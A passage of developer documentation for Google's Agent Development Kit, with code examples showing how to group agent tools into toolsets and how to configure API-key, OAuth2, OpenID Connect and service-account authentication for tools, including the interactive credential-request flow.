License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, FunctionTool, ToolContext, BaseToolset, InMemoryRunner, isFinalResponse, BaseTool, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; function addNumbers(params: { a: number; b: number }, toolContext?: ToolContext): Record { if (!toolContext) { throw new Error("ToolContext is required for this tool."); } const result = params.a + params.b; toolContext.state.set("last_math_result", result); return { result: result }; } function subtractNumbers(params: { a: number; b: number }): Record { return { result: params.a - params.b }; } function greetUser(params: { name: string }): Record { return { greeting: `Hello, ${params.name}!` }; } class SimpleMathToolset extends BaseToolset { private readonly tools: BaseTool[]; constructor(prefix = "") { super([]); // No filter this.tools = [ new FunctionTool({ name: `${prefix}add_numbers`, description: "Adds two numbers and stores the result in the session state.", parameters: z.object({ a: z.number(), b: z.number() }), execute: addNumbers, }), new FunctionTool({ name: `${prefix}subtract_numbers`, description: "Subtracts the second number from the first.", parameters: z.object({ a: z.number(), b: z.number() }), execute: subtractNumbers, }), ]; } async getTools(): Promise { return this.tools; } async close(): Promise { console.log("SimpleMathToolset closed."); } } async function main() { const mathToolset = new SimpleMathToolset("calculator_"); const greetTool = new FunctionTool({ name: "greet_user", description: "Greets the user.", parameters: z.object({ name: z.string() }), execute: greetUser, }); const instruction = `You are a calculator and a greeter. If the user asks for a math operation, use the calculator tools. If the user asks for a greeting, use the greet_user tool. The result of the last math operation is stored in the 'last_math_result' state variable.`; const calculatorAgent = new LlmAgent({ name: "calculator_agent", instruction: instruction, tools: [greetTool, mathToolset], model: "gemini-2.5-flash", }); const runner = new InMemoryRunner({ agent: calculatorAgent, appName: "toolset_app" }); await runner.sessionService.createSession({ appName: "toolset_app", userId: "user1", sessionId: "session1" }); const message: Content = createUserContent("What is 5 + 3?"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: message })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Response from agent: ${text}`); } } } await mathToolset.close(); } main(); ``` In this example: - `SimpleMathToolset` implements `BaseToolset` and its `get_tools()` method returns `FunctionTool` instances for `add_numbers` and `subtract_numbers`. It also customizes their names using a prefix. - The `calculator_agent` is configured with both an individual `greet_tool` and an instance of `SimpleMathToolset`. - When `calculator_agent` is run, ADK will call `math_toolset_instance.get_tools()`. The agent's LLM will then have access to `greet_user`, `calculator_add_numbers`, and `calculator_subtract_numbers` to handle user requests. - The `add_numbers` tool demonstrates writing to `tool_context.state`, and the agent's instruction mentions reading this state. - The `close()` method is called to ensure any resources held by the toolset are released. Toolsets offer a powerful way to organize, manage, and dynamically provide collections of tools to your ADK agents, leading to more modular, maintainable, and adaptable agentic applications. # Authenticating with Tools Supported in ADKPython v0.1.0 Many tools need to access protected resources (like user data in Google Calendar, Salesforce records, etc.) and require authentication. ADK provides a system to handle various authentication methods securely. The key components involved are: 1. **`AuthScheme`**: Defines *how* an API expects authentication credentials (e.g., as an API Key in a header, an OAuth 2.0 Bearer token). ADK supports the same types of authentication schemes as OpenAPI 3.0. To know more about what each type of credential is, refer to [OpenAPI doc: Authentication](https://swagger.io/docs/specification/v3_0/authentication/). ADK uses specific classes like `APIKey`, `HTTPBearer`, `OAuth2`, `OpenIdConnectWithConfig`. 1. **`AuthCredential`**: Holds the *initial* information needed to *start* the authentication process (e.g., your application's OAuth Client ID/Secret, an API key value). It includes an `auth_type` (like `API_KEY`, `OAUTH2`, `SERVICE_ACCOUNT`) specifying the credential type. The general flow involves providing these details when configuring a tool. ADK then attempts to automatically exchange the initial credential for a usable one (like an access token) before the tool makes an API call. For flows requiring user interaction (like OAuth consent), a specific interactive process involving the Agent Client application is triggered. ## Supported Initial Credential Types - **API_KEY:** For simple key/value authentication. Usually requires no exchange. - **HTTP:** Can represent Basic Auth (not recommended/supported for exchange) or already obtained Bearer tokens. If it's a Bearer token, no exchange is needed. - **OAUTH2:** For standard OAuth 2.0 flows. Requires configuration (client ID, secret, scopes) and often triggers the interactive flow for user consent. - **OPEN_ID_CONNECT:** For authentication based on OpenID Connect. Similar to OAuth2, often requires configuration and user interaction. - **SERVICE_ACCOUNT:** For Google Cloud Service Account credentials (JSON key or Application Default Credentials). Typically exchanged for a Bearer token. ## Configuring Authentication on Tools You set up authentication when defining your tool: - **RestApiTool / OpenAPIToolset**: Pass `auth_scheme` and `auth_credential` during initialization - **GoogleApiToolSet Tools**: ADK has built-in 1st party tools like Google Calendar, BigQuery etc,. Use the toolset's specific method. - **APIHubToolset / ApplicationIntegrationToolset**: Pass `auth_scheme` and `auth_credential`during initialization, if the API managed in API Hub / provided by Application Integration requires authentication. WARNING Storing sensitive credentials like access tokens and especially refresh tokens directly in the session state might pose security risks depending on your session storage backend (`SessionService`) and overall application security posture. - **`InMemorySessionService`:** Suitable for testing and development, but data is lost when the process ends. Less risk as it's transient. - **Database/Persistent Storage:** **Strongly consider encrypting** the token data before storing it in the database using a robust encryption library (like `cryptography`) and managing encryption keys securely (e.g., using a key management service). - **Secure Secret Stores:** For production environments, storing sensitive credentials in a dedicated secret manager (like Google Cloud Secret Manager or HashiCorp Vault) is the **most recommended approach**. Your tool could potentially store only short-lived access tokens or secure references (not the refresh token itself) in the session state, fetching the necessary secrets from the secure store when needed. ______________________________________________________________________ ## Journey 1: Building Agentic Applications with Authenticated Tools This section focuses on using pre-existing tools (like those from `RestApiTool/ OpenAPIToolset`, `APIHubToolset`, `GoogleApiToolSet`) that require authentication within your agentic application. Your main responsibility is configuring the tools and handling the client-side part of interactive authentication flows (if required by the tool). ### 1. Configuring Tools with Authentication When adding an authenticated tool to your agent, you need to provide its required `AuthScheme` and your application's initial `AuthCredential`. **A. Using OpenAPI-based Toolsets (`OpenAPIToolset`, `APIHubToolset`, etc.)** Pass the scheme and credential during toolset initialization. The toolset applies them to all generated tools. Here are few ways to create tools with authentication in ADK. Create a tool requiring an API Key. ```py from google.adk.tools.openapi_tool.auth.auth_helpers import token_to_scheme_credential from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset auth_scheme, auth_credential = token_to_scheme_credential( "apikey", "query", "apikey", "YOUR_API_KEY_STRING" ) sample_api_toolset = OpenAPIToolset( spec_str="...", # Fill this with an OpenAPI spec string spec_str_type="yaml", auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring OAuth2. ```py from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset from fastapi.openapi.models import OAuth2 from fastapi.openapi.models import OAuthFlowAuthorizationCode from fastapi.openapi.models import OAuthFlows from google.adk.auth import AuthCredential from google.adk.auth import AuthCredentialTypes from google.adk.auth import OAuth2Auth auth_scheme = OAuth2( flows=OAuthFlows( authorizationCode=OAuthFlowAuthorizationCode( authorizationUrl="https://accounts.google.com/o/oauth2/auth", tokenUrl="https://oauth2.googleapis.com/token", scopes={ "https://www.googleapis.com/auth/calendar": "calendar scope" }, ) ) ) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OAUTH2, oauth2=OAuth2Auth( client_id=YOUR_OAUTH_CLIENT_ID, client_secret=YOUR_OAUTH_CLIENT_SECRET ), ) calendar_api_toolset = OpenAPIToolset( spec_str=google_calendar_openapi_spec_str, # Fill this with an openapi spec spec_str_type='yaml', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring Service Account. ```py from google.adk.tools.openapi_tool.auth.auth_helpers import service_account_dict_to_scheme_credential from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset service_account_cred = json.loads(service_account_json_str) auth_scheme, auth_credential = service_account_dict_to_scheme_credential( config=service_account_cred, scopes=["https://www.googleapis.com/auth/cloud-platform"], ) sample_toolset = OpenAPIToolset( spec_str=sa_openapi_spec_str, # Fill this with an openapi spec spec_str_type='json', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` Create a tool requiring OpenID connect. ```py from google.adk.auth.auth_schemes import OpenIdConnectWithConfig from google.adk.auth.auth_credential import AuthCredential, AuthCredentialTypes, OAuth2Auth from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset auth_scheme = OpenIdConnectWithConfig( authorization_endpoint=OAUTH2_AUTH_ENDPOINT_URL, token_endpoint=OAUTH2_TOKEN_ENDPOINT_URL, scopes=['openid', 'YOUR_OAUTH_SCOPES"] ) auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OPEN_ID_CONNECT, oauth2=OAuth2Auth( client_id="...", client_secret="...", ) ) userinfo_toolset = OpenAPIToolset( spec_str=content, # Fill in an actual spec spec_str_type='yaml', auth_scheme=auth_scheme, auth_credential=auth_credential, ) ``` **B. Using Google API Toolsets (e.g., `calendar_tool_set`)** These toolsets often have dedicated configuration methods. Tip: For how to create a Google OAuth Client ID & Secret, see this guide: [Get your Google API Client ID](https://developers.google.com/identity/gsi/web/guides/get-google-api-clientid#get_your_google_api_client_id) ```py # Example: Configuring Google Calendar Tools from google.adk.tools.google_api_tool import calendar_tool_set client_id = "YOUR_GOOGLE_OAUTH_CLIENT_ID.apps.googleusercontent.com" client_secret = "YOUR_GOOGLE_OAUTH_CLIENT_SECRET" # Use the specific configure method for this toolset type calendar_tool_set.configure_auth( client_id=oauth_client_id, client_secret=oauth_client_secret ) # agent = LlmAgent(..., tools=calendar_tool_set.get_tool('calendar_tool_set')) ``` The sequence diagram of auth request flow (where tools are requesting auth credentials) looks like below: ### 2. Handling the Interactive OAuth/OIDC Flow (Client-Side) If a tool requires user login/consent (typically OAuth 2.0 or OIDC), the ADK framework pauses execution and signals your **Agent Client** application. There are two cases: - **Agent Client** application runs the agent directly (via `runner.run_async`) in the same process. e.g. UI backend, CLI app, or Spark job etc. - **Agent Client** application interacts with ADK's fastapi server via `/run` or `/run_sse` endpoint. While ADK's fastapi server could be setup on the same server or different server as **Agent Client** application The second case is a special case of first case, because `/run` or `/run_sse` endpoint also invokes `runner.run_async`. The only differences are: - Whether to call a python function to run the agent (first case) or call a service endpoint to run the agent (second case). - Whether the result events are in-memory objects (first case) or serialized json string in http response (second case). Below sections focus on the first case and you should be able to map it to the second case very straightforward. We will also describe some differences to handle for the second case if necessary. Here's the step-by-step process for your client application: **Step 1: Run Agent & Detect Auth Request** - Initiate the agent interaction using `runner.run_async`. - Iterate through the yielded events. - Look for a specific function call event whose function call has a special name: `adk_request_credential`. This event signals that user interaction is needed. You can use helper functions to identify this event and extract necessary information. (For the second case, the logic is similar. You deserialize the event from the http response). ```py # runner = Runner(...) # session = await session_service.create_session(...) # content = types.Content(...) # User's initial query print("\nRunning agent...") events_async = runner.run_async( session_id=session.id, user_id='user', new_message=content ) auth_request_function_call_id, auth_config = None, None async for event in events_async: # Use helper to check for the specific auth request event if (auth_request_function_call := get_auth_request_function_call(event)): print("--> Authentication required by agent.") # Store the ID needed to respond later if not (auth_request_function_call_id := auth_request_function_call.id): raise ValueError(f'Cannot get function call id from function call: {auth_request_function_call}') # Get the AuthConfig containing the auth_uri etc. auth_config = get_auth_config(auth_request_function_call) break # Stop processing events for now, need user interaction if not auth_request_function_call_id: print("\nAuth not required or agent finished.") # return # Or handle final response if received ``` *Helper functions `helpers.py`:* ```py from google.adk.events import Event from google.adk.auth import AuthConfig # Import necessary type from google.genai import types def get_auth_request_function_call(event: Event) -> types.FunctionCall: # Get the special auth request function call from the event if not event.content or not event.content.parts: return for part in event.content.parts: if ( part and part.function_call and part.function_call.name == 'adk_request_credential' and event.long_running_tool_ids and part.function_call.id in event.long_running_tool_ids ): return part.function_call def get_auth_config(auth_request_function_call: types.FunctionCall) -> AuthConfig: # Extracts the AuthConfig object from the arguments of the auth request function call if not auth_request_function_call.args or not (auth_config := auth_request_function_call.args.get('authConfig')): raise ValueError(f'Cannot get auth config from function call: {auth_request_function_call}') if isinstance(auth_config, dict): auth_config = AuthConfig.model_validate(auth_config) elif not isinstance(auth_config, AuthConfig): raise ValueError(f'Cannot get auth config {auth_config} is not an instance of AuthConfig.') return auth_config ``` **Step 2: Redirect User for Authorization** - Get the authorization URL (`auth_uri`) from the `auth_config` extracted in the previous step. - **Crucially, append your application's** redirect_uri as a query parameter to this `auth_uri`. This `redirect_uri` must be pre-registered with your OAuth provider (e.g., [Google Cloud Console](https://developers.google.com/identity/protocols/oauth2/web-server#creatingcred), [Okta admin panel](https://developer.okta.com/docs/guides/sign-into-web-app-redirect/spring-boot/main/#create-an-app-integration-in-the-admin-console)). - Direct the user to this complete URL (e.g., open it in their browser). ```py # (Continuing after detecting auth needed) if auth_request_function_call_id and auth_config: # Get the base authorization URL from the AuthConfig base_auth_uri = auth_config.exchanged_auth_credential.oauth2.auth_uri if base_auth_uri: redirect_uri = 'http://localhost:8000/callback' # MUST match your OAuth client app config # Append redirect_uri (use urlencode in production) auth_request_uri = base_auth_uri + f'&redirect_uri={redirect_uri}' # Now you need to redirect your end user to this auth_request_uri or ask them to open this auth_request_uri in their browser # This auth_request_uri should be served by the corresponding auth provider and the end user should login and authorize your applicaiton to access their data # And then the auth provider will redirect the end user to the redirect_uri you provided # Next step: Get this callback URL from the user (or your web server handler) else: print("ERROR: Auth URI not found in auth_config.") # Handle error ``` **Step 3. Handle the Redirect Callback (Client):** - Your application must have a mechanism (e.g., a web server route at the `redirect_uri`) to receive the user after they authorize the application with the provider. - The provider redirects the user to your `redirect_uri` and appends an `authorization_code` (and potentially `state`, `scope`) as query parameters to the URL. - Capture the **full callback URL** from this incoming request. - (This step happens outside the main agent execution loop, in your web server or equivalent callback handler.) **Step 4. Send Authentication Result Back to ADK (Client):** - Once you have the full callback URL (containing the authorization code), retrieve the `auth_request_function_call_id` and the `auth_config` object saved in Client Step 1. - Set the captured callback URL into the `exchanged_auth_credential.oauth2.auth_response_uri` field. Also ensure `exchanged_auth_credential.oauth2.redirect_uri` contains the redirect URI you used. - Create a `types.Content` object containing a `types.Part` with a `types.FunctionResponse`. - Set `name` to `"adk_request_credential"`. (Note: This is a special name for ADK to proceed with authentication. Do not use other names.) - Set `id` to the `auth_request_function_call_id` you saved. - Set `response` to the *serialized* (e.g., `.model_dump()`) updated `AuthConfig` object. - Call `runner.run_async` **again** for the same session, passing this `FunctionResponse` content as the `new_message`. ```py # (Continuing after user interaction) # Simulate getting the callback URL (e.g., from user paste or web handler) auth_response_uri = await get_user_input( f'Paste the full callback URL here:\n> ' ) auth_response_uri = auth_response_uri.strip() # Clean input if not auth_response_uri: print("Callback URL not provided. Aborting.") return # Update the received AuthConfig with the callback details auth_config.exchanged_auth_credential.oauth2.auth_response_uri = auth_response_uri # Also include the redirect_uri used, as the token exchange might need it auth_config.exchanged_auth_credential.oauth2.redirect_uri = redirect_uri # Construct the FunctionResponse Content object auth_content = types.Content( role='user', # Role can be 'user' when sending a FunctionResponse parts=[ types.Part( function_response=types.FunctionResponse( id=auth_request_function_call_id, # Link to the original request name='adk_request_credential', # Special framework function name response=auth_config.model_dump() # Send back the *updated* AuthConfig ) ) ], ) # --- Resume Execution --- print("\nSubmitting authentication details back to the agent...") events_async_after_auth = runner.run_async( session_id=session.id, user_id='user', new_message=auth_content, # Send the FunctionResponse back ) # --- Process Final Agent Output --- print("\n--- Agent Response after Authentication ---") async for event in events_async_after_auth: # Process events normally, expecting the tool call to succeed now print(event) # Print the full event for inspection ``` Note: Authorization response with Resume feature If your ADK agent workflow is configured with the [Resume](/adk-docs/runtime/resume/) feature, you also must include the Invocation ID (`invocation_id`) parameter with the authorization response. The Invocation ID you provide must be the same invocation that generated the authorization request, otherwise the system starts a new invocation with the authorization response. If your agent uses the Resume feature, consider including the Invocation ID as a parameter with your authorization request, so it can be included with the authorization response. For more details on using the Resume feature, see [Resume stopped agents](/adk-docs/runtime/resume/). **Step 5: ADK Handles Token Exchange & Tool Retry and gets Tool result** - ADK receives the `FunctionResponse` for `adk_request_credential`. - It uses the information in the updated `AuthConfig` (including the callback URL containing the code) to perform the OAuth **token exchange** with the provider's token endpoint, obtaining the access token (and possibly refresh token). - ADK internally makes these tokens available by setting them in the session state). - ADK **automatically retries** the original tool call (the one that initially failed due to missing auth). - This time, the tool finds the valid tokens (via `tool_context.get_auth_response()`) and successfully executes the authenticated API call. - The agent receives the actual result from the tool and generates its final response to the user. ______________________________________________________________________ The sequence diagram of auth response flow (where Agent Client send back the auth response and ADK retries tool calling) looks like below: ## Journey 2: Building Custom Tools (`FunctionTool`) Requiring Authentication This section focuses on implementing the authentication logic *inside* your custom Python function when creating a new ADK Tool. We will implement a `FunctionTool` as an example. ### Prerequisites Your function signature *must* include [`tool_context: ToolContext`](https://google.github.io/adk-docs/tools-custom/#tool-context). ADK automatically injects this object, providing access to state and auth mechanisms. ```py from google.adk.tools import FunctionTool, ToolContext from typing import Dict def my_authenticated_tool_function(param1: str, ..., tool_context: ToolContext) -> dict: # ... your logic ... pass my_tool = FunctionTool(func=my_authenticated_tool_function) ``` ### Authentication Logic within the Tool Function Implement the following steps inside your function: **Step 1: Check for Cached & Valid Credentials:** Inside your tool function, first check if valid credentials (e.g., access/refresh tokens) are already stored from a previous run in this session. Credentials for the current sessions should be stored in `tool_context.invocation_context.session.state` (a dictionary of state) Check existence of existing credentials by checking `tool_context.invocation_context.session.state.get(credential_name, None)`. ```py from google.oauth2.credentials import Credentials from google.auth.transport.requests import Request # Inside your tool function TOKEN_CACHE_KEY = "my_tool_tokens" # Choose a unique key SCOPES = ["scope1", "scope2"] # Define required scopes creds = None cached_token_info = tool_context.state.get(TOKEN_CACHE_KEY) if cached_token_info: try: creds = Credentials.from_authorized_user_info(cached_token_info, SCOPES) if not creds.valid and creds.expired and creds.refresh_token: creds.refresh(Request()) tool_context.state[TOKEN_CACHE_KEY] = json.loads(creds.to_json()) # Update cache elif not creds.valid: creds = None # Invalid, needs re-auth tool_context.state[TOKEN_CACHE_KEY] = None except Exception as e: print(f"Error loading/refreshing cached creds: {e}") creds = None tool_context.state[TOKEN_CACHE_KEY] = None if creds and creds.valid: # Skip to Step 5: Make Authenticated API Call pass else: # Proceed to Step 2... pass ``` **Step 2: Check for Auth Response from Client** - If Step 1 didn't yield valid credentials, check if the client just completed the interactive flow by calling `exchanged_credential = tool_context.get_auth_response()`. - This returns the updated `exchanged_credential` object sent back by the client (containing the callback URL in `auth_response_uri`). ```py # Use auth_scheme and auth_credential configured in the tool. # exchanged_credential: AuthCredential | None exchanged_credential = tool_context.get_auth_response(AuthConfig( auth_scheme=auth_scheme, raw_auth_credential=auth_credential, )) # If exchanged_credential is not None, then there is already an exchanged credetial from the auth response. if exchanged_credential: # ADK exchanged the access token already for us access_token = exchanged_credential.oauth2.access_token refresh_token = exchanged_credential.oauth2.refresh_token creds = Credentials( token=access_token, refresh_token=refresh_token, token_uri=auth_scheme.flows.authorizationCode.tokenUrl, client_id=auth_credential.oauth2.client_id, client_secret=auth_credential.oauth2.client_secret, scopes=list(auth_scheme.flows.authorizationCode.scopes.keys()), ) # Cache the token in session state and call the API, skip to step 5 ``` **Step 3: Initiate Authentication Request** If no valid credentials (Step 1.) and no auth response (Step 2.) are found, the tool needs to start the OAuth flow. Define the AuthScheme and initial AuthCredential and call `tool_context.request_credential()`. Return a response indicating authorization is needed. ```py # Use auth_scheme and auth_credential configured in the tool. tool_context.request_credential(AuthConfig( auth_scheme=auth_scheme, raw_auth_credential=auth_credential, )) return {'pending': true, 'message': 'Awaiting user authentication.'} # By setting request_credential, ADK detects a pending authentication event. It pauses execution and ask end user to login. ``` **Step 4: Exchange Authorization Code for Tokens** ADK automatically generates oauth authorization URL and presents it to your Agent Client application. your Agent Client application should follow the same way described in Journey 1 to redirect the user to the authorization URL (with `redirect_uri` appended). Once a user completes the login flow following the authorization URL and ADK extracts the authentication callback url from Agent Client applications, automatically parses the auth code, and generates auth token. At the next Tool call, `tool_context.get_auth_response` in step 2 will contain a valid credential to use in subsequent API calls. **Step 5: Cache Obtained Credentials** After successfully obtaining the token from ADK (Step 2) or if the token is still valid (Step 1), **immediately store** the new `Credentials` object in `tool_context.state` (serialized, e.g., as JSON) using your cache key. ```py # Inside your tool function, after obtaining 'creds' (either refreshed or newly exchanged) # Cache the new/refreshed tokens tool_context.state[TOKEN_CACHE_KEY] = json.loads(creds.to_json()) print(f"DEBUG: Cached/updated tokens under key: {TOKEN_CACHE_KEY}") # Proceed to Step 6 (Make API Call) ``` **Step 6: Make Authenticated API Call** - Once you have a valid `Credentials` object (`creds` from Step 1 or Step 4), use it to make the actual call to the protected API using the appropriate client library (e.g., `googleapiclient`, `requests`). Pass the `credentials=creds` argument. - Include error handling, especially for `HttpError` 401/403, which might mean the token expired or was revoked between calls. If you get such an error, consider clearing the cached token (`tool_context.state.pop(...)`) and potentially returning the `auth_required` status again to force re-authentication. ```py # Inside your tool function, using the valid 'creds' object # Ensure creds is valid before proceeding if not creds or not creds.valid: return {"status": "error", "error_message": "Cannot proceed without valid credentials."} try: service = build("calendar", "v3", credentials=creds) # Example api_result = service.events().list(...).execute() # Proceed to Step 7 except Exception as e: # Handle API errors (e.g., check for 401/403, maybe clear cache and re-request auth) print(f"ERROR: API call failed: {e}") return {"status": "error", "error_message": f"API call failed: {e}"} ``` **Step 7: Return Tool Result** - After a successful API call, process the result into a dictionary format that is useful for the LLM. - **Crucially, include a** along with the data. ```py # Inside your tool function, after successful API call processed_result = [...] # Process api_result for the LLM return {"status": "success", "data": processed_result} ``` Full Code tools_and_agent.py ```py import os from google.adk.auth.auth_schemes import OpenIdConnectWithConfig from google.adk.auth.auth_credential import AuthCredential, AuthCredentialTypes, OAuth2Auth from google.adk.tools.openapi_tool.openapi_spec_parser.openapi_toolset import OpenAPIToolset from google.adk.agents.llm_agent import LlmAgent # --- Authentication Configuration --- # This section configures how the agent will handle authentication using OpenID Connect (OIDC), # often layered on top of OAuth 2.0. # Define the Authentication Scheme using OpenID Connect. # This object tells the ADK *how* to perform the OIDC/OAuth2 flow. # It requires details specific to your Identity Provider (IDP), like Google OAuth, Okta, Auth0, etc. # Note: Replace the example Okta URLs and credentials with your actual IDP details. # All following fields are required, and available from your IDP. auth_scheme = OpenIdConnectWithConfig( # The URL of the IDP's authorization endpoint where the user is redirected to log in. authorization_endpoint="https://your-endpoint.okta.com/oauth2/v1/authorize", # The URL of the IDP's token endpoint where the authorization code is exchanged for tokens. token_endpoint="https://your-token-endpoint.okta.com/oauth2/v1/token", # The scopes (permissions) your application requests from the IDP. # 'openid' is standard for OIDC. 'profile' and 'email' request user profile info. scopes=['openid', 'profile', "email"] ) # Define the Authentication Credentials for your specific application. # This object holds the client identifier and secret that your application uses # to identify itself to the IDP during the OAuth2 flow. # !! SECURITY WARNING: Avoid hardcoding secrets in production code. !! # !! Use environment variables or a secret management system instead. !! auth_credential = AuthCredential( auth_type=AuthCredentialTypes.OPEN_ID_CONNECT, oauth2=OAuth2Auth( client_id="CLIENT_ID", client_secret="CIENT_SECRET", ) ) # --- Toolset Configuration from OpenAPI Specification --- # This section defines a sample set of tools the agent can use, configured with Authentication # from steps above. # This sample set of tools use endpoints protected by Okta and requires an OpenID Connect flow # to acquire end user credentials. with open(os.path.join(os.path.dirname(__file__), 'spec.yaml'), 'r') as f: spec_content = f.read() userinfo_toolset = OpenAPIToolset( spec_str=spec_content, spec_str_type='yaml', # ** Crucially, associate the authentication scheme and credentials with these tools. ** # This tells the ADK that the tools require the defined OIDC/OAuth2 flow. auth_scheme=auth_scheme, auth_credential=auth_credential, ) # --- Agent Configuration --- # Configure and create the main LLM Agent. root_agent = LlmAgent( model='gemini-2.0-flash', name='enterprise_assistant', instruction='Help user integrate with multiple enterprise systems, including retrieving user information which may require authentication.', tools=userinfo_toolset.get_tools(), ) # --- Ready for Use --- # The `root_agent` is now configured with tools protected by OIDC/OAuth2 authentication. # When the agent attempts to use one of these tools, the ADK framework will automatically # trigger the authentication flow defined by `auth_scheme` and `auth_credential` # if valid credentials are not already available in the session. # The subsequent interaction flow would guide the user through the login process and handle # token exchanging, and automatically attach the exchanged token to the endpoint defined in # the tool. ``` agent_cli.py ```py import asyncio from dotenv import load_dotenv from google.adk.artifacts.in_memory_artifact_service import InMemoryArtifactService from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.genai import types from .helpers import is_pending_auth_event, get_function_call_id, get_function_call_auth_config, get_user_input from .tools_and_agent import root_agent load_dotenv() agent = root_agent async def async_main(): """ Main asynchronous function orchestrating the agent interaction and authentication flow. """ # --- Step 1: Service Initialization --- # Use in-memory services for session and artifact storage (suitable for demos/testing). session_service = InMemorySessionService() artifacts_service = InMemoryArtifactService() # Create a new user session to maintain conversation state. session = session_service.create_session( state={}, # Optional state dictionary for session-specific data app_name='my_app', # Application identifier user_id='user' # User identifier ) # --- Step 2: Initial User Query --- # Define the user's initial request. query = 'Show me my user info' print(f"user: {query}") # Format the query into the Content structure expected by the ADK Runner. content = types.Content(role='user', parts=[types.Part(text=query)]) # Initialize the ADK Runner runner = Runner( app_name='my_app', agent=agent, artifact_service=artifacts_service, session_service=session_service, ) # --- Step 3: Send Query and Handle Potential Auth Request --- print("\nRunning agent with initial query...") events_async = runner.run_async( session_id=session.id, user_id='user', new_message=content ) # Variables to store details if an authentication request occurs. auth_request_event_id, auth_config = None, None # Iterate through the events generated by the first run. async for event in events_async: # Check if this event is the specific 'adk_request_credential' function call. if is_pending_auth_event(event): print("--> Authentication required by agent.") auth_request_event_id = get_function_call_id(event) auth_config = get_function_call_auth_config(event) # Once the auth request is found and processed, exit this loop. # We need to pause execution here to get user input for authentication. break # If no authentication request was detected after processing all events, exit. if not auth_request_event_id or not auth_config: print("\nAuthentication not required for this query or processing finished.") return # Exit the main function # --- Step 4: Manual Authentication Step (Simulated OAuth 2.0 Flow) --- # This section simulates the user interaction part of an OAuth 2.0 flow. # In a real web application, this would involve browser redirects. # Define the Redirect URI. This *must* match one of the URIs registered # with the OAuth provider for your application. The provider sends the user # back here after they approve the request. redirect_uri = 'http://localhost:8000/dev-ui' # Example for local development # Construct the Authorization URL that the user must visit. # This typically includes the provider's authorization endpoint URL, # client ID, requested scopes, response type (e.g., 'code'), and the redirect URI. # Here, we retrieve the base authorization URI from the AuthConfig provided by ADK # and append the redirect_uri. # NOTE: A robust implementation would use urlencode and potentially add state, scope, etc. auth_request_uri = ( auth_config.exchanged_auth_credential.oauth2.auth_uri + f'&redirect_uri={redirect_uri}' # Simple concatenation; ensure correct query param format ) print("\n--- User Action Required ---") # Prompt the user to visit the authorization URL, log in, grant permissions, # and then paste the *full* URL they are redirected back to (which contains the auth code). auth_response_uri = await get_user_input( f'1. Please open this URL in your browser to log in:\n {auth_request_uri}\n\n' f'2. After successful login and authorization, your browser will be redirected.\n' f' Copy the *entire* URL from the browser\'s address bar.\n\n' f'3. Paste the copied URL here and press Enter:\n\n> ' ) # --- Step 5: Prepare Authentication Response for the Agent --- # Update the AuthConfig object with the information gathered from the user. # The ADK framework needs the full response URI (containing the code) # and the original redirect URI to complete the OAuth token exchange process internally. auth_config.exchanged_auth_credential.oauth2.auth_response_uri = auth_response_uri auth_config.exchanged_auth_credential.oauth2.redirect_uri = redirect_uri # Construct a FunctionResponse Content object to send back to the agent/runner. # This response explicitly targets the 'adk_request_credential' function call # identified earlier by its ID. auth_content = types.Content( role='user', parts=[ types.Part( function_response=types.FunctionResponse( # Crucially, link this response to the original request using the saved ID. id=auth_request_event_id, # The special name of the function call we are responding to. name='adk_request_credential', # The payload containing all necessary authentication details. response=auth_config.model_dump(), ) ) ], ) # --- Step 6: Resume Execution with Authentication --- print("\nSubmitting authentication details back to the agent...") # Run the agent again, this time providing the `auth_content` (FunctionResponse). # The ADK Runner intercepts this, processes the 'adk_request_credential' response # (performs token exchange, stores credentials), and then allows the agent # to retry the original tool call that required authentication, now succeeding with # a valid access token embedded. events_async = runner.run_async( session_id=session.id, user_id='user', new_message=auth_content, # Provide the prepared auth response ) # Process and print the final events from the agent after authentication is complete. # This stream now contain the actual result from the tool (e.g., the user info). print("\n--- Agent Response after Authentication ---") async for event in events_async: print(event) if __name__ == '__main__': asyncio.run(async_main()) ``` helpers.py ```py from google.adk.auth import AuthConfig from google.adk.events import Event import asyncio # --- Helper Functions --- async def get_user_input(prompt: str) -> str: """ Asynchronously prompts the user for input in the console. Uses asyncio's event loop and run_in_executor to avoid blocking the main asynchronous execution thread while waiting for synchronous `input()`. Args: prompt: The message to display to the user. Returns: The string entered by the user. """ loop = asyncio.get_event_loop() # Run the blocking `input()` function in a separate thread managed by the executor. return await loop.run_in_executor(None, input, prompt) def is_pending_auth_event(event: Event) -> bool: """ Checks if an ADK Event represents a request for user authentication credentials. The ADK framework emits a specific function call ('adk_request_credential') when a tool requires authentication that hasn't been previously satisfied. Args: event: The ADK Event object to inspect. Returns: True if the event is an 'adk_request_credential' function call, False otherwise. """ # Safely checks nested attributes to avoid errors if event structure is incomplete. return ( event.content and event.content.parts and event.content.parts[0] # Assuming the function call is in the first part and event.content.parts[0].function_call # The specific function name indicating an auth request from the ADK framework. and event.content.parts[0].function_call.name == 'adk_request_credential' ) def get_function_call_id(event: Event) -> str: """ Extracts the unique ID of the function call from an ADK Event. This ID is crucial for correlating a function *response* back to the specific function *call* that the agent initiated to request for auth credentials. Args: event: The ADK Event object containing the function call. Returns: The unique identifier string of the function call. Raises: ValueError: If the function call ID cannot be found in the event structure. (Corrected typo from `contents` to `content` below) """ # Navigate through the event structure to find the function call ID. if ( event and event.content and event.content.parts and event.content.parts[0] # Use content, not contents and event.content.parts[0].function_call and event.content.parts[0].function_call.id ): return event.content.parts[0].function_call.id # If the ID is 